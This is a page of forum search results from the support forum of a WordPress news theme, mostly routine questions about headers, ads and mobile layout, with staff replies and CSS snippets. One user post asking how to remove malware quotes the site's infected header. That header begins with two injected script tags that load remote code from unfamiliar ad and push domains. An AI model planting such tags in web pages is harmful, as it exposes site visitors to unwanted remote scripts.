Search Results for 'header'

Results from the Forum
Oana1973
Participant
#0

I’ve just updated the theme today and I managed to insert de auto ads only on the desktop version. I can’t find the mobile header in order to insert the codes! Where is it?

Calin
tagDiv Staff

Hi,

This can be achieve using the header manager import a header from tagDiv Cloud Library and edit the mega menu from header zone.
-> https://www.screencast.com/t/YJrbirOUpM
-> https://www.screencast.com/t/AznhmT8QyMy

Thank you!

Simion C.
tagDiv Staff

Hi,

I don’ think the issue is caused by the CSS code, when I try to use the search on mobile as soon as I click on the search icon a javascript error appears in the browser console
http://prntscr.com/nlu5jo
So while it would be possible to switch the icon positions for the menu and search on mobile – http://prntscr.com/nlu6p5 the error is still there. Seems the menu works, just the search has this problem.

Usually this kind of javascript errors may appear when the theme is conflicting with various scripts entered in the theme panel or theme files, or in many cases plugins. You could begin to investigate plugins or codes (if you used any). Here is the code I used for the positioning of the icon, if you want to use it for mobile

@media (max-width: 767px) {
#td-header-menu #td-top-mobile-toggle {
position: absolute;
right: 0;
}
.td-header-main-menu .header-search-wrap {
position:absolute;
right: auto;
}}

Thanks

nitrofox
Participant
#0

I Update in last hour to new update wordpress 5.2, and have erros now.

Example:

Warning: Use of undefined constant REQUEST_URI – assumed ‘REQUEST_URI’ (this will throw an Error in a future version of PHP) in /home/user/public_html/wp-content/themes/newspaper/functions.php on line 73

Warning: Cannot modify header information – headers already sent by (output started at /home/user/public_html/wp-content/themes/newspaper/functions.php:73) in /home/user/public_html/wp-includes/pluggable.php on line 1251

Warning: Cannot modify header information – headers already sent by (output started at /home/user/public_html/wp-content/themes/newspaper/functions.php:73) in /home/user/public_html/wp-includes/pluggable.php on line 1254

Thanks,

fanauto
Participant
#0

Hi,

Here’s my website : http://www.africargus.com ,

I have a technical issue, which is related to the title tag of all web pages.

In Newspaper, specifically in header.php, I noticed that the title tag was missing…. How can I resolve this problem?

I don’t want to have the web address as the title of a page, even if it is the homepage or another page.

Can you help me please ?

If you need more information don’t hesitate

Thanks a lot

Rita

sasquatters
Participant
Malware - topic
#0

I have a bunch of malware. How can I remove it myself? I do not have $250 to spend on a company removing it.

[[<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2285981"></script> <script src="//pushmono.com/ntfc.php?p=2285983" data-cfasync="false" async></script> <!-- Theme: Newspaper by tagDiv.com 2017 Version: 9.2.2 (rara) Deploy mode: deploy uid: 5cd180bc2bbce --> <!-- Custom css from theme panel --> <style type="text/css" media="screen"> /* custom css theme panel */ /*Hide Donate button*/ .tdm-header-menu-btns { visibility: hidden; } /*Add Sold Out tag to product image*/ .sold-out-overlay { background: #8224e3; color: #fff; font-size: 14px; font-weight: 600; padding: 5px 10px; position: absolute; right: 0px; top: 0px; } .woocommerce ul.products li.product .woocommerce-loop-product__title { background: transparent; color: black; } </style> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </

I have it on every page.
Thank you.

andresnor
tagDiv Member

The header is already set in theme template and the horizontal scrolling is a problem. On a phone it creates a sideways rubber band. You ca see it if you rezise a normal desktop browserwindow down. Se image attached
Image link

  • This reply was modified 7 years by andresnor.
  • This reply was modified 7 years by andresnor.
Shaz
Participant
#0

Hello there,

I have managed to change most of the parts of your theme to RTL here: https://cninuae.com/ar/#

One of the last issues I’m facing is that I cannot successfully transfer the search icon to the left of the screen.

I’m using a separate rtl.css in child theme. I tried placing this code at the end of rtl.css:
.tdm-header .header-search-wrap {
position: relative;
float: left;
margin-left: 175px;
}
It works and places the search button to the left, but when I click on the search icon the whole page sort of hangs in mobile view. Desktop works fine.

Can somebody please sort out this issue?

Sincere regards.

Calin
tagDiv Staff

Hi,

Is look that you have this problem only on header template, if you set the header template on you post/page or in theme panel, this problem should disappear.

Thank you!

Calin
tagDiv Staff

Hi,

Unfortunately there are no settings in theme panel for this, this can be achieve only if you make some changes in theme files, for this you need to edit the td-login-modal.php from wp-content/plugins/td-composer/legacy/Newspaper/parts/header/td-login-modal.php
-> https://www.screencast.com/t/PfvgOPRMqTZ
If you need some help with css let me know!

Thank you!

Catalin
tagDiv Staff

Hi,

I have checked again your post page and I saw that the size of your header Ad is not properly displayed when you are using the Infinite Scroll on the post. Please notice that our theme simply takes the Google Adsense which you have added at the ad box and only display it on the Front End without any changes over that code. Also, the theme has not been tested with Google Ad manager and that problem happen due for this. Use the default settings for Google Adsense without any untested plugins, leave just to active only the required and tested plugins, clear all the caches, purge CDN files and check the results.

Hope this helps and let us know how it goes!

Thank you!

essexindia
Participant
#0

Template is missing. Standalone themes need to have a index.php template file. Child themes need to have a Template header in the style.css stylesheet.

Calin
tagDiv Staff

Hi,

Most of the theme files were moved into the tagdiv composer plugin as per the requirements of envato: https://help.author.envato.com/hc/en-us/articles/360000472383-WordPress-Theme-Requirements.
We wrote an article on the subject here: https://tagdiv.com/updating-the-core-of-tagdiv-themes/

In order to edit the logo-h1.php you need to go in wp-content/plugins/td-composer/legacy/Newspaper/parts/header/logo-h1.php

Thank you!

Simion C.
tagDiv Staff

Hi,

I see that only one ad seems to appear, the one in the footer. There is another one at the top below the header but it has no size – http://prntscr.com/nlg9rz
I remember when we tested the AMP auto ads that they worked fine, all there is to it is to enter the ad code in the theme panel dedicated section – http://prntscr.com/nlgaq2 and they should appear. After refreshing the page a couple of times the top ad appeared as well – http://prntscr.com/nlgfko
On Firefox I get quite a lot of ads – http://prntscr.com/nlgh56
http://prntscr.com/nlgh9qhttp://prntscr.com/nlghib (usually 3 ads)
While on Chrome I get 1 or two ads.

I did find some similar topics with the same issues, but no actual solution
https://github.com/ampproject/amphtml/issues/19952http://prntscr.com/nlgi5i
https://stackoverflow.com/questions/55426552/how-to-fix-amp-auto-ads-on-wordpress-with-with-error-cannot-resize-element-and

I don’t quite know what one could do in such cases.

Calin
tagDiv Staff

Hi,

You can remove that continue to the category text by editing the page with tagDiv Composer, click on flex blocks and change the header template 12, this one have the continue button -> https://www.screencast.com/t/PsPdO3OwSvWW

Thank you!

Calin
tagDiv Staff
Calin
tagDiv Staff

Hi,

Was my mistake, I do not understand correctly what you need, I think that you want to look like this -> https://www.screencast.com/t/XexuehHPouyG if is so please replace the code that I provide to you with this one
.td-header-wrap .td-header-menu-wrap-full {
background-color: #fff;
}

Thank you!

andresnor
Participant
#0

Can’t get rid of horizontal scrolling in mobile-view in my header (buildt with header manager). Anything I can do?

https://www.bjerra29.no/tdb_templates/blank-header-template/

Calin
tagDiv Staff

Hi,

Unfortunately there is no options in theme to can change the h3 header from this block this can be achieve only if you make changes in theme files, but these changes will need to be done after each update.

Thank you!

cpt_mk47
Participant
#0

Hello Team

First of all I would like to thank all of you for creating such a beautiful and premium theme and your dedicated time and efforts, keep up the GOLD work guys ?.

I am using newspaper fastnews theme Ver 9.7.2 with custom header ( dance header : template 36) and I don’t use child-theme for now.
I really like the sign in / join modal you created guys but I would like to make some modifications (short code for social media login and css ), I tried but it seems it`s not responding to any, even for smallest change.

please advise,

Have a beautiful day.

Vlad S
tagDiv Staff

Hello !

Sorry for misunderstanding your issue !

In order to change header and footer images you’ll have to follow these steps: https://www.screencast.com/t/YTrr204YLM0W ; https://www.screencast.com/t/gSdxuz48g5
Also you can take a look at this tutorial on how to create and edit logos for your website: https://tagdiv.com/create-a-logo-with-newspaper-theme/

Thank you !

cyberking
Participant
#0

In Theme Panel-> Ads, When i click some header such as Article top ad. It stuck loading.
In Add New Post, When I want to choose image from media stuck loading too.
error
stuck loading
please help

vadoingiappone
tagDiv Member

Hi, I have make this before the last update, and all work good.

Now, with last version, I have only 4 file in that directory.
header-menu.php
header-style-1.php
– logo.php
– td-login-modal.php

I’m tring to edit logo.php, but nothing happen. How to?

Thanks a lot
Fabrizio

stilu2k6
tagDiv Member

This works, but how i get my header background back =(?

cahpolli
tagDiv Member

Hi!!

No, I want to change the logo url in header and footer.
https://www.screencast.com/t/RLCd9LWB1
https://www.screencast.com/t/QRfhftSm8O5
I had changed the url before, but with the newspaper 9.7 update I lost those changes in my child theme.

  • This reply was modified 7 years by cahpolli.
Viewing 25 results - 14,476 through 14,500 (of 29,850 total)